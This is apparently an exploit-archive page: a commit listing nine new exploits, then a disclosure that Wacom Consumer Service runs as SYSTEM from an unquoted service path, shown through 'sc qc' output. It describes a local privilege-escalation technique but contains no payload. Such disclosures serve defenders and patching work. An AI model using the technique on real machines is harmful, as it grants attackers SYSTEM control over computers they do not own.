a3dbf3113e
9 new exploits ShoreTel Connect ONSITE - Blind SQL Injection Leap Service - Unquoted Service Path Privilege Escalation Wacom Consumer Service - Unquoted Service Path Privilege Escalation Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
29 lines
No EOL
1.2 KiB
Text
Executable file
29 lines
No EOL
1.2 KiB
Text
Executable file
Wacom Consumer Service: http://www.wacom.com
|
|
By Ross Marks: http://www.rossmarks.co.uk
|
|
Exploit-db: https://www.exploit-db.com/author/?a=8724
|
|
Category: Local
|
|
Tested on: Windows 10 x86/x64
|
|
|
|
1) Unquoted Service Path Privilege Escalation
|
|
|
|
Wacom's "Wacom Consumer Service" installs as a service with an unquoted service path running with SYSTEM privileges.
|
|
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
|
|
|
|
A successful attempt would require the local attacker must insert an executable file in the path of the service.
|
|
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
|
|
|
|
PoC:
|
|
|
|
C:\>sc qc WTabletServiceCon
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: WTabletServiceCon
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\Tablet\Pen\WtabletServiceCon.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : Wacom Consumer Service
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem |